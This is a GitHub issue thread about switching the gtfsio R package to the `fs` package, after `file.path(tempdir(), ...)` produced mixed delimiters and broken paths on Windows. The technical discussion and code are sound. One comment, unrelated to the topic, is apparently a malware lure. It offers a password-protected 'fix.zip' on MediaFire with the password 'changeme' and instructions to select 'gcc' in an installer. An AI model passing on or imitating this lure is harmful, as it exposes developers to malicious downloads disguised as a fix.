### ISSUE TITLE
Use `fs` for all file path operations

### ISSUE THREAD

**Issue by mpadge** [r-transit/gtfsio#38]
I recently got an email about `gtfsrouter` luckily with reprex pasted in to show that file paths on windows were unusable, just because of combining `temp.dir()` with `file.path()`. Using `fs` solves those issues be standardising paths on windows, which I suggest would also be good to implement here. Happy to do this if nobody else is?

**Comment by jungminjun824** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by polettif** [comment]
Sounds good, thanks 👍 I probably should look into `fs`, haven't used it so far.

**Comment by rafapereirabr** [comment]
Hi @mpadge , thanks for the heads up ! Could you please share the reprex they sent you? 

ps. I usually use `tempdir()`  and `tools::R_user_dir()` in others packages I haven't come across any issues so far.

**Comment by mpadge** [comment]
The reprex was this:
``` r
> f <- berlin_gtfs_to_zip ()
> gtfs <- extract_gtfs (f, quiet = TRUE)

#> Errore in check_extract_pars(filename, stn_suffixes) :
#>  filename C:\Users\<User>\AppData\Local\Temp\Rtmp4GhleE/vbb.zip does not exist
```
The filepath for `f` constructed in `berlin_gtfs_to_zip()` just used `file.path(tempdir(), "vbb.zip")`. And on windows that led to `tempdir()` using `\`, but `file.path()` appending filename with `/`. This can always happen with windows systems, which was one of the motivations for the `fs` package. `fs` always normalises paths to use consistent deilimiters. The package has no additional deps at all, is very lightweight, and has 1-1 replacements for all standard functions:
``` r
fs::path(fs::path_temp(), "vbb.zip")
```

**Comment by rafapereirabr** [comment]
Thanks for sharing, @mpadge !
